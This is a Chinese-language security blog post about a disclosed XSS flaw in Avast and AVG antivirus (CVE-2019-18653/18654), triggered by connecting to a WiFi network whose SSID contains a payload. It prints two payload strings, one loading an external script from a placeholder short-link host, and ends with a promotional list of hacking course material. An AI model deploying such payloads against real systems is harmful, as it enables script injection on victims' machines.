Avast是由捷克的一家安全公司開發的防毒軟體,由電腦版和手機版,能執行在各類作業系統和手機系統上。
近日,國外一名安全研究員發現了Avast的一個漏洞,因此獲得了5000美元的獎勵。我們整理了一份圖文資料,給大家去還原一下這個漏洞的利用過程。
漏洞利用過程還原首先通過簡單的XSS Payload構造一個SSID的名字,什麼是SSID呢?SSID其實就是我們每天都在使用的無線局WiFi的名字。
只需要使用簡單的><img src=x onerror=prompt(1)>作為SSID即可。由於SSID長度的限制,如果想引用外部指令碼,可以使用><embed src=//tiny.cc/XYZABCX>。
然後在已安裝好Avast防毒軟體的電腦上連線無線WIFI,選擇由XSS構成的SSID,等待payload生效。受害者只要連線上攻擊者的無線網路,幾秒內就會中招。
受影響的版本Avast Internet Security的19.3.2369版本和AVG Internet Security的19.3.3084版本均受到影響。
時間線2019年3月21日:發現了漏洞
2019年3月22日:向[email protected]報告了漏洞
2019年3月25日:Avast確認漏洞的存在
2019年5月24日:Avast詢問此漏洞是否已解決(在Avast 19.4中)。
2019年6月12日:Avast認為此漏洞相當嚴重,因此決定獎勵5000美元。
2019年10月30日:Avast上的注入被標記為CVE-2019–18653,AVG上的注入被標記為CVE-2019–18654。
雖然這個漏洞是在安全研究人員在膝上型電腦上發現的,但安卓手機或蘋果手機版本也可能存在類似問題。
大家平時在連線WIFI的時候也要注意,類似上面提到的SSID,就不要亂連線了。
本文收錄在白帽黑客訓練營。現在加入我們白帽黑客訓練營的圈子,即可獲得大量有價值的學習資料。
資料每週都在更新,我們建立了資料庫,在圈子公告中,即可看到圈子資料庫。
目前資料如下:1.網路安全:手機遠端控制教程,電腦遠端控制教程,Windows系統漏洞利用,安卓APP逆向工程,使用 Ettercap 進行網路嗅探,用Kali Linux蜜罐引誘黑客進入陷阱,網站滲透測試實戰教程,Wireshark抓取Android手機APP資料包,網站漏洞掃描,網站資料庫安全,zANTI手機滲透測試教程,網路掃描神器Nmap使用教程,等等。
2.C語言教程:10本C語言經典書籍,150套C語言真題,C語言常見問題集錦,等等。
3.從零開始學PHP教程,PHP是網站開發中最長使用到的程式語言,從事web網路安全研究,PHP是繞不開的話題。
4.網站前端教程:1.3G各類工具書和應用案例集錦,學會你就是一名合格的前端工程師。
5.組合語言和編譯原理,喜歡研究反編譯的朋友不要錯過。
6.CNAA網路工程師教程,密碼學,網站資料庫原理及應用,資訊保安。
7.考慮到部分朋友,基礎薄弱,我們還準備了大量的基礎教程:系統安裝,電腦網路設定,系統日常維護,電腦病毒和木馬查殺,系統安全設定和優化,電腦綜合應用。